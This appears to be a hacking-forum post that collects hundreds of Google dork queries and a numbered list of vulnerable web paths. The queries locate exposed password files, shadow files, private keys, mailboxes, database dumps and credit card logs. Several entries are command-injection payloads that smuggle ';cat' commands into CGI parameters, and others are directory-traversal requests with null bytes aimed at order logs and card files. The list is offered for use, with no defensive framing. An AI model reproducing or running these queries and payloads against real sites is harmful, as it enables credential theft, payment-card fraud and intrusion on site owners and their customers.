wwwboard WebAdmin inurlasswd.txt wwwboard|webadmin

"# -FrontPage-" extwd inurlservice | authors | administrators | users) "# -FrontPage-"
inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
etc (index.of)
ext:ini eudora.ini
ext:ini Version=... password
ext:txt inurl:unattend.txt
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target

* " -sample -cvs -example

filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf sc_serv.conf
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetypeass pass intext:userid
filetypeem intextrivate
filetyperoperties inurl:db intextassword
filetypewd service
filetypewl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql ("values * MD" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable secret $"
intext:"powered by Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:dupics inurladd.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
inurl:"GRC.DAT" intext:"password"
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:ccbill filetype:log
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter -bootpwd -man
inurl:nuke filetype:sql
inurlspfd.conf intextassword -sample -test -tutorial -download
inurlap-secrets -cvs
inurlerform filetype:ini
inurl:secring ext:skr | extgp | ext:bak
inurl:vtund.conf intextass -cvs
inurl:zebra.conf intextassword -sample -test -tutorial -download

"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn Copyright (C)" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":" +":" +":" filetype:txt
+"HSTSNR" -"netop.com"
-sitehp.net -"The PHP Group" inurl:source inurl:url extHp
FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:asp inurlathto.asp
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
extqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp fp
filetype:fp fp -site:gov -site:mil -"cvs log"
filetype:fp fp
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns ns
filetypera ora
filetypera tnsnames
filetypedb pdb backup (Pilot | Pluckerdb)
filetypehp inurl:index inurlhpicalendar -site:sourceforge.net
filetypeot inurl:john.pot
filetypest inurl:"outlook.pst"
filetypest pst -from -to -date
filetype:qbb qbb
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
iletype:log cron.log
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intextpassword | passcode) intextusername | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "- weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"edna:streaming mp server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurldbc.ini ext:ini -cvs
inurlerl/printenv
inurlhp.ini filetype:ini
inurlreferences.ini "[emule]"
inurlrofiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
robots.txt
site:edu admin grades
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
"adding new user" inurl:addnewuser -"there are no domains"
(inurl:/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
+htpasswd +WS_FTP.LOG filetype:log
filetypehp HAXPLORER "Server Files Browser"
intitle:"Web Data Administrator - Login"
intitle:admin intitle:login
inurl:"phpOracleAdmin/php" -download -cvs
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
PHP Shell (unprotected)
PHPKonsole PHPShell filetypehp -echo
Public PHP FileManagers
"Index Of /network" "last modified"
"index of cgi-bin"
"index of" / picasa.ini
"index of" inurl:recycler
"Index of" rar r nfo Modified
"intitle:Index.Of /" stats merchant cgi-* etc
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
"Web File Browser" "Use regular expression"
"Welcome to phpMyAdmin" " Create new database"
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
Index of phpMyAdmin
index.of.dcim
index.of.password
index.of.password
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
intitle:"album permissions" "Users who can modify photos" "EVERYBODY"
intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat
intitle:"HFS /" +"HttpFileServer"
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:"Index of /CFIDE/" administrator
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intitle:"index of" -inurl:htm -inurl:html mp
intitle:"Index of" cfide
intitle:"index of" intext:"content.ie"
intitle:"index of" inurl:ftp (pub | incoming)
intitle:"index.of.personal"
intitle:"webadmin - /*" filetypehp directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:index.of /AlbumArt_
intitle:index.of /maildir/new/
intitle:index.of abyss.conf
intitle:intranet inurl:intranet +intext:"human resources"
intitle:upload inurl:upload intext:upload -forum -shop -support -wc
inurl:/pls/sample/admin_/help/
inurl:/tmp
inurl:backup intitle:index.of inurl:admin
inurl:explorer.cfm inurldirpath|This_Directory)
inurl:jee/examples/jsp
inurljspdemos
private
protected
secret
secure
winnt
filetypel -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)
"File Upload Manager v." "rename to"
"Powered by Land Down Under "
"powered by YellDL"
ext:asp "powered by DUForum" inurlmessages|details|login|default|register) -site:duware.com
ext:asp inurlUgallery intitle:"." -site:dugallery.com -site:duware.com
ext:cgi inurl:ubb_test
ezBOO "Administrator Panel" -cvs
filetype:cgi inurl:cachemgr.cgi
filetype:cnf my.cnf -cvs -example
filetype:inc inc intext:setcookie
filetype:lit lit (books|ebooks)
filetype:mdb inurl:"news/news"
filetypehp inurl:"viewfile" -"index.php" -"idfil
filetype:wsdl wsdl
Gallery configuration setup files
intitle:"ASP FileMan" Resend -site:iisworks.com
intitle:"Directory Listing" "tree view"
intitle:"Index of /" modified php.exe
intitle:"PHP Explorer" exthp (inurlhpexplorer.php | inurl:list.php | inurl:browse.php)
intitle:"phpremoteview" filetypehp "Name, Size, Type, Modify"
intitle:mywebftp "Please enter your password"
inurl:" WWWADMIN.PL" intitle:"wwwadmin"
inurl:"nph-........cgi" "Start browsing through this CGI-based ......."
inurl:"plog/register.php"
inurl:cgi.asx?StoreID
inurl:changepassword.cgi -cvs
inurl:click.php intext:PHPClickLog
inurlhp.exe filetype:exe -example.com
inurl:robpoll.cgi filetype:cgi
  Reply
#10
اینم دورک های بعدی
Code:
--------------------------------------------------------------------------------






1. "Index of /admin"
2. "Index of /password"
3. "Index of /mail"
4. "Index of /" +passwd
5. "Index of /" +password.txt
6. "Index of /" +.htaccess
7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto
8. administrators.pwd.index
9. authors.pwd.index
10. service.pwd.index
11. filetype:config web
12. gobal.asax index
13. allintitle: "index of/admin"
14. allintitle: "index of/root"
15. allintitle: sensitive filetype:doc
16. allintitle: restricted filetype :mail
17. allintitle: restricted filetype:doc site:gov
18. inurlasswd filetype:txt
19. inurl:admin filetype:db
20. inurl:iisadmin
21. inurl:"auth_user_file.txt"
22. inurl:"wwwroot/*."
23. top secret site:mil
24. confidential site:mil
25. allinurl: winnt/system32/ (get cmd.exe)
26. allinurl:/bash_history
27. intitle:"Index of" .sh_history
28. intitle:"Index of" .bash_history
29. intitle:"index of" passwd
30. intitle:"index of" people.lst
31. intitle:"index of" pwd.db
32. intitle:"index of" etc/shadow
33. intitle:"index of" spwd
34. intitle:"index of" master.passwd
35. intitle:"index of" htpasswd
36. intitle:"index of" members OR accounts
37. intitle:"index of" user_carts OR user_cart
38. ALTERNATIVE INPUTS====================
39. _vti_inf.html
40. service.pwd
41. users.pwd
42. authors.pwd
43. administrators.pwd
44. shtml.dll
45. shtml.exe
46. fpcount.exe
47. default.asp
48. showcode.asp
49. sendmail.cfm
50. getFile.cfm
51. imagemap.exe
52. test.bat
53. msadcs.dll
54. htimage.exe
55. counter.exe
56. browser.inc
57. hello.bat
58. default.aspdvwssr.dll
59. cart32.exe
60. add.exe
61. index.jsp
62. SessionServlet
63. shtml.dll
64. index.cfm
65. page.cfm
66. shtml.exe
67. web_store.cgi
68. shop.cgi
69. upload.asp
70. default.asp
71. pbserver.dll
72. phf
73. test-cgi
74. finger
75. Count.cgi
76. jj
77. php.cgi
78. php
79. nph-test-cgi
80. handler
81. webdist.cgi
82. webgais
83. websendmail
84. faxsurvey
85. htmlscript
86. perl.exe
87. wwwboard.pl
88. www-sql
89. view-source
90. campas
91. aglimpse
92. glimpse
93. man.sh
94. AT-admin.cgi
95. AT-generate.cgi
96. filemail.pl
97. maillist.pl
98. info2www
99. files.pl
100. bnbform.cgi
101. survey.cgi
102. classifieds.cgi
103. wrap
104. cgiwrap
105. edit.pl
106. perl
107. names.nsf
108. webgais
109. dumpenv.pl
110. test.cgi
111. submit.cgi
112. guestbook.cgi
113. guestbook.pl
114. cachemgr.cgi
115. responder.cgi
116. perlshop.cgi
117. query
118. w3-msql
119. plusmail
120. htsearch
121. infosrch.cgi
122. publisher
123. ultraboard.cgi
124. db.cgi
125. formmail.cgi
126. allmanage.pl
127. ssi
128. adpassword.txt
129. redirect.cgi
130. cvsweb.cgi
131. login.jsp
132. dbconnect.inc
133. admin
134. htgrep
135. wais.pl
136. amadmin.pl
137. subscribe.pl
138. news.cgi
139. auctionweaver.pl
140. .htpasswd
141. acid_main.php
142. access.log
143. log.htm
144. log.html
145. log.txt
146. logfile
147. logfile.htm
148. logfile.html
149. logfile.txt
150. logger.html
151. stat.htm
152. stats.htm
153. stats.html
154. stats.txt
155. webaccess.htm
156. wwwstats.html
157. source.asp
158. perl
159. mailto.cgi
160. YaBB.pl
161. mailform.pl
162. cached_feed.cgi
163. global.cgi
164. Search.pl
165. build.cgi
166. common.php
167. show
168. global.inc
169. ad.cgi
170. WSFTP.LOG
171. index.html~
172. index.php~
173. index.html.bak
174. index.php.bak
175. print.cgi
176. register.cgi
177. webdriver
178. bbs_forum.cgi
179. mysql.class
180. sendmail.inc
181. CrazyWWWBoard.cgi
182. search.pl
183. way-board.cgi
184. webpage.cgi
185. pwd.dat
186. adcycle
187. post-query
188. help.cgi
189. /robots.txt
190. /admin.mdb
191. /shopping.mdb
192. /arg;
193. /stats/styles.css
194. /statshelp.htm
195. /favicon.ico
196. /stats/admin.mdb
197. /shopdbtest.asp
198. /cgi-bin/test.cgi
199. /cgi-bin/test.pl
200. /cgi-bin/env.cgi
201. /photos/protest/styles.css
202. http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
203. /cgi-bin/whereami.cgi
204. /shopping400.mdb
205. /cgi/test.cgi
206. /cgi-bin/test2.pl
207. /photos/protest/kingmarch_02.html
208. /chevy/index.htm
209. /cgi-bin/glocation.cgi
210. /cgi-bin/test2.cgi
211. /ccbill/glocation.cgi
212. /cgi-bin/styles.css
213. /shopping350.mdb
214. /cgi-bin/shopper.cgi
215. /shopadmin.asp
216. /news_2003-02-27.htm
217. /cgi-bin/whois.cgi
218. 3 /cgi-bin/calendar.pl
219. 3 /cgi-bin/calendar/calendar.pl
220. 3 /cgibin/styles.css
221. 3 /venem.htm
222. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm
223. 2 /cgi-bin/where.pl
224. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
225. 2 /cgibin/recon.cgi
226. 2 /cgibin/test.cgi
227. 2 /WebShop/templates/styles.css
228. 2 /stats/shopping350.mdb
229. 2 /cgi-bin/mailform.cgi
230. 2 /cgi-bin/recon.cgi
231. 2 /chevy
232. 2 /cgi-bin/servinfo.cgi
233. 2 /acart2_0.mdb
234. 2 /cgi-bin/where.cgi
235. 2 /chevy/
236. 2 /stats/www.savethemall.net/stats/19-refers.htm
237. 2 /ccbill/secure/ccbill.log
238. 2 /cgi/recon.cgi
239. 2 /stats/www.gregoryflynn.com/chevy
240. 2 /ibill/glocation.cgi
241. 2 /ccbill/whereami.cgi
242. 2 /ibill/whereami.cgi
243. 2 /apps_trial.htm
244. 2 /cgi-bin/lancelot/recon.cgi
245. 2 /cgi-bin/DCShop/Orders/styles.css
246. 1 /cgi-bin/htmanage.cgi
247. 1 /stats/www.tysons.net/stats/05-refers.htm
248. 1 /cgi-bin/mastergate/add.cgi
249. 1 /cgi-bin/openjournal.cgi
250. 1 /cgi-bin/calendar/calendar_admin.pl
251. 1 /cgibin/ibill/count.cgi
252. 1 /cgi-bin/nbmember2.cgi
253. 1 /cgi-bin/mastergate/count.cgi
254. 1 /cgi-bin/mastergate/accountcreate.cgi
255. 1 /cgi-bin/ibill/accountcreate.cgi
256. 1 /cgibin/MasterGate2/count.cgi
257. 1 /cgi-bin/amadmin.pl
258. 1 /cgibin/mailform.cgi
259. 1 /cgibin/mastergate/count.cgi
260. 1 /cgibin/harvestor.cgi
261. 1 /cgibin/igate/count.cgi
262. 1 /WebShop
263. 1 /shopdisplaycategories.asp
264. 1 /cgi-bin/DCShop/Orders/orders.txt
265. 1 /cgi-bill/revshare/joinpage.cgi
266. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm
267. 1 /cgi-local/DCShop/auth_data/styles.css
268. 1 /cgi-bin/add-passwd.cgi
269. 1 /cgi-bin/MasterGate/count.cgi
270. 1 /apps_shop.htm%20/comersus/database/comersus.mdb
271. 1 /data/verotellog.txt
272. 1 /epwd/ws_ftp.log
273. 1 /stats/www.dialacure.com/stats/16-refers.htm
274. 1 /cgi/MasterGate2/count.cgi
275. 1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
276. 1 /wwii/styles.css
277. 1 /cgi-bin/admin.mdb
278. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm
279. 1 /cgi-bin/ibill-tools/count.cgi
280. 1 /WebShop/templates/cc.txt
281. 1 /cgibin/ibill/accountcreate.cgi
282. 1 /cgi-bin/count.cgi
283. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt
284. 1 /cgi/mastergate/count.cgi
285. 1 /cgi-bin/EuroDebit/addusr.pl
286. 1 /cgi-bin/dbm-passwd.cgi
287. 1 /cgi/igate/accountcreate.cgi
288. 1 /cgi-bin/store/Log_files/your_order.log
289. store/log_files/your_order.log
290. /cgi-bin/DCShop/Orders/orders.txt
291. /vpasp/shopdbtest.asp
292. /orders/checks.txt
293. /WebShop/logs
294. /ccbill/secure/ccbill.log
295. /scripts/cart32.exe
296. /cvv2.txt
297. /cart/shopdbtest.asp
298. /cgi-win/cart.pl
299. /shopdbtest.asp
300. /WebShop/logs/cc.txt
301. /cgi-local/cart.pl
302. /PDG_Cart/order.log
303. /config/datasources/expire.mdb
304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
305. /orders/orders.txt
306. /cgis/cart.pl
307. /webcart/carts
308. /cgi-bin/cart32.exe/cart32clientlist
309. /cgi/cart.pl
310. /comersus/database/comersus.mdb
311. /WebShop/templates/cc.txt
312. /Admin_files/order.log
313. /orders/mountain.cfg
314. /cgi-sys/cart.pl
315. /scripts/cart.pl
316. /htbin/cart.pl
317. /productcart/database/EIPC.mdb
318. /shoponline/fpdb/shop.mdb
319. /config/datasources/myorder.mdb
320. /PDG_Cart/shopper.conf
321. /shopping/database/metacart.mdb
322. /bin/cart.pl
323. /cgi-bin/cart32.ini
324. /database/comersus.mdb
325. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
326. /cgi-bin/store/Admin_files/myorderlog.txt
327. /cgi-bin/orders.txt
328. /cgi-bin/store/Admin_files/your_order.log
329. /test/test.txt
330. /fpdb/shop.mdb
331. /cgibin/shop/orders/orders.txt
332. /shopadmin1.asp
333. /cgi-bin/shop.cgi
334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
335. /cgi-bin/PDG_cart/card.txt
336. /shopper.cgi?preadd=action&key=PROFA&template=order1.log
337. /store/shopdbtest.asp
338. /log_files/your_order.log
339. /_database/expire.mdb
340. /HyperStat/stat_what.log
341. /cgibin/DCShop/auth_data/auth_user_file.txt
342. /htbin/orders/orders.txt
343. /SHOP/shopadmin.asp
344. /index.cgi?page=../admin/files/order.log
345. /vpshop/shopadmin.asp
346. /webcart/config
347. /PDG/order.txt
348. /cgi-bin/shopper.cgi
349. /orders/order.log
350. /orders/db/zzzbizorders.log.html
351. /easylog/easylog.html
352. /cgi-bin/store/Log_files/your_order.log
353. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
354. /comersus_message.asp?
355. /orders/import.txt
356. /htbin/DCShop/auth_data/auth_user_file.txt
357. /admin/html_lib.pl
358. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
359. /cgi-bin/DCShop/auth_data/auth_user_file.txt
360. /cgi-bin/shop.pl/page=;cat%20shop.pl
361. /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
362. /HBill/htpasswd
363. /bin/shop/auth_data/auth_user_file.txt
364. /cgi-bin/cs/shopdbtest.asp
365. /mysql/shopping.mdb
366. /Catalog/config/datasources/Products.mdb
367. /trafficlog
368. /cgi/orders/orders.txt
369. /cgi-local/PDG_Cart/shopper.conf
370. /store/cgi-bin/Admin_files/expire.mdb
371. /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
372. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
373. /cgi-bin/mc.txt
374. /cgi-bin/mall2000.cgi
375. /cgi-win/DCShop/auth_data/auth_user_file.txt
376. /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
377. /store/commerce.cgi
378. /scripts/shop/orders/orders.txt
379. /product/shopping350.mdb
380. /super_stats/access_logs
381. /cgi-local/orders/orders.txt
382. /cgi-bin/PDG_Cart/mc.txt
383. /cgibin/cart32.exe
384. /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
385. /cgibin/password.txt
386. /Catalog/cart/carttrial.dat
387. /catalog/Admin/Admin.asp
388. /ecommerce/admin/user/admin.asp
389. /data/productcart/database/EIPC.mdb
390. /store/admin_files/commerce_user_lib.pl
391. /cgi-bin/store/index.cgi
392. /paynet.txt
393. /config/datasources/store/billing.mdb
394. /_database/shopping350.mdb
395. /cgi-bin/shopper.exe?search
396. /cgi/shop.pl/page=;cat%20shop.pl
397. /cgi-bin/store/Admin_files/orders.txt
398. /cgi-bin/store/commerce_user_lib.pl
399. /cgi-sys/pagelog.cgi
400. /cgi-sys/shop.pl/page=;cat%20shop.pl
401. /scripts/weblog
402. /fpdb/shopping400.mdb
403. /htbin/shop/orders/orders.txt
404. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
405. /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
406. /mall_log_files/
407. /cgi-bin/perlshop.cgi
408. /tienda/shopdbtest.asp
409. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
410. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
411. /WebShop/logs/ck.log
412. /fpdb/shopping300.mdb
413. /mysql/store.mdb
414. /cgi-bin/store/Admin_files/commerce_user_lib.pl
415. /config.dat
416. /order/order.log
417. /commerce_user_lib.pl
418. /Admin_files/AuthorizeNet_user_lib.pl
419. /cvv2.asp
420. /cgi-bin/cart32/CART32-order.txt
421. /wwwlog
422. /cool-logs/mlog.html
423. /cgi-bin/pass/merchant.cgi.log
424. /cgi-local/pagelog.cgi
425. /cgi-bin/pagelog.cgi
426. /cgi-bin/orders/cc.txt
427. /cgis/shop/orders/orders.txt
428. /admin/admin_conf.pl
429. /cgi-bin/pdg_cart/order.log
430. /cgi/PDG_Cart/order.log
431. /Admin_files/ccelog.txt
432. /cgi-bin/orders/mc.txt
433. /cgi/cart32.exe
434. /ecommerce/admin/admin.asp
435. /scripts/DCShop/auth_data/auth_user_file.txt
436. /Catalog/config/datasources/Expire.mdb
437. /ecommerce/admin/shopdbtest.asp
438. /mysql/mystore.mdb
439. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
441. /cgi-bin/Count.cgi?df=callcard.dat
442. /logfiles/
443. /shopping/shopping350.mdb
444. /admin/configuration.pl
445. /cgis/DCShop/auth_data/auth_user_file.txt
446. /cgis/cart32.exe
447. /cgi-bin/dcshop.cgi
448. /cgi-win/shop/auth_data/auth_user_file.txt
449. /shopping400.mdb
450. /HBill/config
451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log
452. /search=action&keywords=GSD%20&template=order.log
453. /WebCart/orders.txt
454. /PDG_Cart/authorizenets.txt
455. /cgi-bin/AnyForm2
456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat
457. /cgi-bin/PDG_Cart/order.log
458. /expire.mdb
459. /logger/
460. /webcart-lite/orders/import.txt
461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
462. /cgi-bin/PDG_Cart/shopper.conf
463. /cgi-bin/cart32.exe
464. /dc/orders/orders.txt
465. /cgi-local/DCShop/orders/orders.txt
466. /shop.pl/page=shop.cfg
467. /cgi-local/cart32.exe
468. /cgi-win/pagelog.cgi
469. /cgi-win/shop/orders/orders.txt
470. /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
471. /cgi-sys/DCShop/auth_data/auth_user_file.txt
472. /cgi-bin/www-sql;;;
473. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
474. /scripts/orders/orders.txt
475. /cgi-local/shop.pl/shop.cfg
476. /search=action&keywords=cwtb%20&template=expire.mdb
477. /php/mylog.phtml
478. /config/datasources/shopping.mdb
479. /php-coolfile/action.php?action=edit&file=config.php
480. /cgi-bin/ezmall2000/mall2000.cgi
481. /cgi/DCShop/orders/orders.txt
482. /cgi-local/shop.pl
483. /cgis/DCShop/orders/orders.txt
484. /product/shopdbtest.asp
485. /ASP/cart/database/metacart.mdb
486. /cgi-bin/cgi-lib.pl
487. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
488. /search=action&keywords=cwtb%20&template=order.log
489. /mysql/expire.mdb
490. /scripts/shop/auth_data/auth_user_file.txt
491. /cgi-bin/cart32/whatever-OUTPUT.txt
492. /Shopping%20Cart/shopdbtest.asp
493. /cgi/shop/auth_data/auth_user_file.txt
494. /shop/shopping350.mdb
495. /cgi-bin/store/Authorize_Net.pl
496. /scripts/DCShop/orders/orders.txt
497. /store/log_files/commerce_user_lib.pl
498. /shopping/shopadmin.asp
499. /cgi-bin/orderlog.txt
500. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
501. /cool-logs/mylog.html
502. /cgibin/shop.pl/page=;cat%20shop.pl
503. /htbin/shop.pl/page=;cat%20shop.pl
504. /cgi-win/orders/orders.txt
505. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
506. /SHOP/shopdbtest.asp
